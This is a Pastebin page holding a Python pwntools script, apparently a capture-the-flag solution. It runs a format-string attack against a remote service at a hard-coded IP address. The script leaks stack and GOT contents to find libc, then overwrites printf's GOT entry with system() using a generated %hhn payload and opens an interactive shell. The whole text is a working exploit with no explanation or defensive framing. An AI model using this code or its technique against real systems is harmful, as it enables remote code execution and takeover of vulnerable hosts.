Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ```from pwn import *
- host = '78.46.224.86'
- port = 1337
- context.os = 'linux'
- context.arch = 'amd64'
- p = remote(host, port)
- def dump_stack(at=None, n=2048):
- pl = ""
- if at:
- for i in range(n // 8):
- pl += "%{}$p.".format(at + i)
- else:
- pl = ".%p" * (n // 8)
- pl += "END"
- p.sendline(pl)
- x = p.readuntil("END")[:-3].strip().strip(".")
- stack_leak = x.split(".")[1:]
- stack_leak = map(lambda y: 0 if "nil" in y else int(y, 16), stack_leak)
- return stack_leak
- def fmtleaker(addr):
- log.debug("leaking addr 0x{:x}".format(addr))
- vp = None
- for i in range(3):
- try:
- #vp = remote(host, port)
- pl = "AAAA%8$s.ENDBBBB"
- pl += p64(addr)
- if "\n" in pl:
- log.warning("newline in payload!")
- return None
- p.sendline(pl)
- x = p.recv(1024)
- if x:
- f = x.find("AAAA") + 4
- l = x.find(".ENDBBBB")
- res = x[f:l]
- if res == "":
- return "\x00"
- else:
- return res
- return None
- except KeyboardInterrupt:
- raise
- except EOFError:
- log.debug("got EOF for leaking addr 0x{:x}".format(addr))
- pass
- except Exception:
- log.warning("got exception...", exc_info=sys.exc_info())
- finally:
- if vp:
- vp.close()
- return None
- def print_got():
- for off in range(3):
- leaked = ''
- while len(leaked) < 8:
- addr = bin_got_addr + len(leaked)
- x = fmtleaker(addr+off*8)
- if x:
- leaked += x
- else:
- leaked += "\xff"
- #log.info(hexdump(leaked))
- print hex(bin_got_addr+off*8) + ": " + hex(u64(leaked[:8]))
- bin_addr = 0x400000
- bin_got_addr = bin_addr + 0x201000
- printf_got = bin_got_addr + 0x18
- offset___libc_start_main_ret = 0x203f1
- offset_system = 0x00000000000456d0
- offset_dup2 = 0x00000000000f8380
- offset_read = 0x00000000000f7c60
- offset_write = 0x00000000000f7cc0
- offset_str_bin_sh = 0x189fc0
- offset_puts = 0x0000000000070960
- libc_index = 37
- stack = dump_stack(libc_index, 16)
- libc_stack = stack[0]
- libc_address = libc_stack - offset___libc_start_main_ret
- libc_bin_sh = libc_address + offset_str_bin_sh
- libc_system = libc_address + offset_system
- libc_puts = libc_address + offset_puts
- log.info("libc_address: " + hex(libc_address))
- log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh)))
- log.info("libc_system: " + hex(libc_system))
- log.info("bin_got_addr: " + hex(bin_got_addr))
- log.info("printf_got: " + hex(printf_got))
- log.info("got befor:")
- print_got()
- buffer_start = 6
- class PayloadGenerator:
- def __init__(self, index=0):
- self.mem = []
- self.index = index
- def write(self, where, what):
- for i in xrange(5):
- self.mem.append((where + i, (int(what) >> (i * 8)) & 0xFF))
- def payload_len(self):
- mem = self.mem
- payload = ''
- mem.sort(key=operator.itemgetter(1))
- printed = 0
- index = 10 #dummy value
- for addr, value in mem:
- if value != printed:
- if value - printed > 8:
- payload += "%." + str(value - printed) + "x"
- else:
- payload += "A" * (value - printed)
- printed = value
- payload += "%" + str(index + self.index) + "$hhn"
- index += 1
- payload += "A" * (8 - (len(payload) % 8))
- return len(payload)
- def gen(self):
- mem = self.mem
- payload = ''
- mem.sort(key=operator.itemgetter(1))
- printed = 0
- index = self.payload_len() / 8
- for addr, value in mem:
- if value != printed:
- if value - printed > 8:
- payload += "%." + str(value - printed) + "x"
- else:
- payload += "A" * (value - printed)
- printed = value
- payload += "%" + str(index + self.index) + "$hhn"
- index += 1
- payload += "A" * (8 - (len(payload) % 8))
- for addr, value in mem:
- payload += p64(addr)
- return payload
- gen = PayloadGenerator(buffer_start)
- gen.write(printf_got, libc_system)
- payload = gen.gen()
- print hexdump(payload, width=8)
- p.sendline(payload)
- print p.recv(1024)
- p.interactive()
- log.info("got after: ")
- print_got()```
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement